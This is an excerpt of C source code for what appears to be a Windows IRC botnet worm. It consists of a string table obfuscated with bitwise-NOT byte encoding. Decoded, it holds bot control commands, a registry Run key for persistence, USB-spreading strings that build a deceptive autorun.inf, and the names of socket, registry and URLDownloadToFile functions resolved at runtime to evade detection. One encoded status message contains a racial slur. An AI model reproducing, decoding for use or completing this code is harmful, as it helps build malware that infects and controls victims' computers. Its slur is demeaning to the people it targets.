    char cmd__RECONNECT[]          = "\x92\x9E\x96\x91\xD1\x8D\x9A\x9C\x90\x91";  /* main.recon */
    char cmd__REMOVAL[]            = "\x92\x9E\x96\x91\xD1\x8D\x9A\x92\x90\x89\x9E\x93"; /* main.removal */
    char cmd__JOIN[]               = "\x92\x9E\x96\x91\xD1\x95\x90\x96\x91"; /* main.join */
    char cmd__PART[]               = "\x92\x9E\x96\x91\xD1\x8F\x9E\x8D\x8B"; /* main. part */
    char *chan          = "\xDC\x8B\x9A\x8C\x8B";
    char *chanps      = "\x8B\x9A\x8C\x8B";
    char *authost       = "\x8B\x9A\x8C\x8B";
  char exename[]              = "\x8B\x9A\x8C\x8B\xD1\x9A\x87\x9A";
    char regkey[]               = "\xAC\x90\x99\x8B\x88\x9E\x8D\x9A\xA3\xA3\xB2\x96\x9C\x8D\x90\x8C\x90\x99\x8B\xA3\xA3\xA8\x96\x91\x9B\x90\x88\x8C\xA3\xA3\xBC\x8A\x8D\x8D\x9A\x91\x8B\xA9\x9A\x8D\x8C\x96\x90\x91\xA3\xA3\xAD\x8A\x91";
    char regname[]              = "\x8B\x9A\x8C\x8B";
    char open[]                 = "\x90\x8F\x9A\x91";
    char *key13 = "\xAC\x90\x99\x8B\x88\x9E\x8D\x9A\xA3\xA3\xB2\x96\x9C\x8D\x90\x8C\x90\x99\x8B\xA3\xA3\xA8\x96\x91\x9B\x90\x88\x8C\xA3\xA3\xBC\x8A\x8D\x8D\x9A\x91\x8B\xA9\x9A\x8D\x8C\x96\x90\x91\xA3\xA3\xAD\x8A\x91";
char my_usragent[] = "\x8B\x9A\x8C\x8B";
   char *NewInstall_Host = "";

    char rcmsg[] = "\x8D\x9A\x9C\x90\x91\x9A\x9C\x8B\x96\x91\x98";
    char qtmsg[] = "\xAD\x9A\x92\x90\x89\x96\x91\x98\xDF\x99\x8D\x90\x92\xDF\xB1\x90\x9B\x9A\xD1";
    char wgerr[] = "\x9A\x8D\x8D\x90\x8D";
    char wgrm[] = "\x8D\x9A\x92\x90\x89\x96\x91\xDF\x9B\x9E\xDF\x99\x96\x93\x9A\xDF\x91\x96\x98\x98\x9E";
char dld[] = "\xBB\x90\x88\x91\x93\x90\x9E\x9B\x9A\x9B\xC5";
char ns[] = "\xB9\x9E\x96\x93\x9A\x9B\xDF\x8B\x90\xDF\x8D\x8A\x91\xDF\x99\x96\x93\x9A\xC5";
char rng[] = "\xB9\x96\x93\x9A\xDF\x8D\x8A\x91\x91\x96\x91\x98\xC5";
char rdpcmd[] = "\x8D\x9B\x8F\xD1\x9C\x92\x9B";
char USB_STR_RECYCLER[]   =		"\xA3\xA3\xAD\xBA\xBC\xA6\xBC\xB3\xBA\xAD";
char USB_STR_REC_SUBDIR[]   =		"\xA3\xA3\x99\x96\x8D\x9A";
char USB_STR_DESKTOP_INI[]   =		"\xA3\xA3\xBB\x9A\x8C\x94\x8B\x90\x8F\xD1\x96\x91\x96";
char USB_STR_AUTORUN_INF[]   =		"\xA3\xA3\xBE\xAA\xAB\xB0\xAD\xAA\xB1\xD1\x96\x91\x99";
char USB_STR_AUTORUN_DATA1[]   =	"\xA4\x9E\x8A\x8B\x90\x8D\x8A\x91\xA2\xA3\x8D\xA3\x91\x90\x8F\x9A\x91\xC2";
char USB_STR_AUTORUN_DATA2[]   =	"\xA3\x8D\xA3\x91\x96\x9C\x90\x91\xC2\xDA\xAC\x86\x8C\x8B\x9A\x92\xAD\x90\x90\x8B\xDA\xA3\xA3\x8C\x86\x8C\x8B\x9A\x92\xCC\xCD\xA3\xA3\xAC\xB7\xBA\xB3\xB3\xCC\xCD\xD1\x9B\x93\x93\xD3\xCB\xA3\x8D\xA3\x91\x9E\x9C\x8B\x96\x90\x91\xC2\xB0\x8F\x9A\x91\xDF\x99\x90\x93\x9B\x9A\x8D\xDF\x8B\x90\xDF\x89\x96\x9A\x88\xDF\x99\x96\x93\x9A\x8C\xA3\x8D\xA3\x91\x8C\x97\x9A\x93\x93\xA3\xA3\x90\x8F\x9A\x91\xC2\xB0\x8F\x9A\x91\xA3\x8D\xA3\x91\x8C\x97\x9A\x93\x93\xA3\xA3\x90\x8F\x9A\x91\xA3\xA3\x9C\x90\x92\x92\x9E\x91\x9B\xC2";
char USB_STR_AUTORUN_DATA3[]   =	"\xA3\x8D\xA3\x91\x8C\x97\x9A\x93\x93\xA3\xA3\x90\x8F\x9A\x91\xA3\xA3\x9B\x9A\x99\x9E\x8A\x93\x8B\xC2\xCE";
char USB_STR_FILENAME[]   =		"\x8B\x9A\x8C\x8B\xD1\x9A\x87\x9A";

    /* IRC */
    char str_nick[]                = "\xB1\xB6\xBC\xB4";
    char str_user[]                = "\xAA\xAC\xBA\xAD";
    char str_privmsg[]             = "\xAF\xAD\xB6\xA9\xB2\xAC\xB8";
    char str_notice[]              = "\xB1\xB0\xAB\xB6\xBC\xBA";
    char str_pass[]                = "\xAF\xBE\xAC\xAC";
    char str_join[]                = "\xB5\xB0\xB6\xB1";
    char str_part[]                = "\xAF\xBE\xAD\xAB";
    char str_quit[]                = "\xAE\xAA\xB6\xAB";
    char str_ping[]                = "\xAF\xB6\xB1\xB8";
    char str_pong[]                = "\xAF\xB0\xB1\xB8";
    char str_my_443[]              = "\xCB\xCB\xCC";
    char str_my_332[]              = "\xCC\xCC\xCD";

    /* Shell32.dll */
    char shell32_[]             = "\x8C\x97\x9A\x93\x93\xCC\xCD\xD1\x9B\x93\x93";
    char ShellExecute_[]        = "\xAC\x97\x9A\x93\x93\xBA\x87\x9A\x9C\x8A\x8B\x9A\xBE";

    /* Advapi32.dll */
    char advapi32_[]            = "\xBE\x9B\x89\x9E\x8F\x96\xCC\xCD\xD1\x9B\x93\x93";
    char RegCreateKeyEx_[]      = "\xAD\x9A\x98\xBC\x8D\x9A\x9E\x8B\x9A\xB4\x9A\x86\xBA\x87\xBE";
    char RegSetValueEx_[]       = "\xAD\x9A\x98\xAC\x9A\x8B\xA9\x9E\x93\x8A\x9A\xBA\x87\xBE";
    char RegCloseKey_[]         = "\xAD\x9A\x98\xBC\x93\x90\x8C\x9A\xB4\x9A\x86";

    /* WS2_32.dll */
    char WS2_32[]              = "\xA8\xAC\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93";
    char WSACleanup[]          = "\xA8\xAC\xBE\xBC\x93\x9A\x9E\x91\x8A\x8F";
    char WSAStartup[]          = "\xA8\xAC\xBE\xAC\x8B\x9E\x8D\x8B\x8A\x8F";
    char closesocket[]         = "\x9C\x93\x90\x8C\x9A\x8C\x90\x9C\x94\x9A\x8B";
    char connect[]             = "\x9C\x90\x91\x91\x9A\x9C\x8B";
    char gethostbyname[]       = "\x98\x9A\x8B\x97\x90\x8C\x8B\x9D\x86\x91\x9E\x92\x9A";
    char htons[]               = "\x97\x8B\x90\x91\x8C";
    char recv[]                = "\x8D\x9A\x9C\x89";
    char send[]                = "\x8C\x9A\x91\x9B";
    char socket[]              = "\x8C\x90\x9C\x94\x9A\x8B";
    char inet_addr[]           = "\x96\x91\x9A\x8B\xA0\x9E\x9B\x9B\x8D";
    char select[]              = "\x8C\x9A\x93\x9A\x9C\x8B";

    /*UrlMon.dll */
    char urlmon[]              = "\x8A\x8D\x93\x92\x90\x91\xD1\x9B\x93\x93";
    char URLDownloadToFile[]   = "\xAA\xAD\xB3\xBB\x90\x88\x91\x93\x90\x9E\x9B\xAB\x90\xB9\x96\x93\x9A\xBE";
char decode_pass[] = "poop";
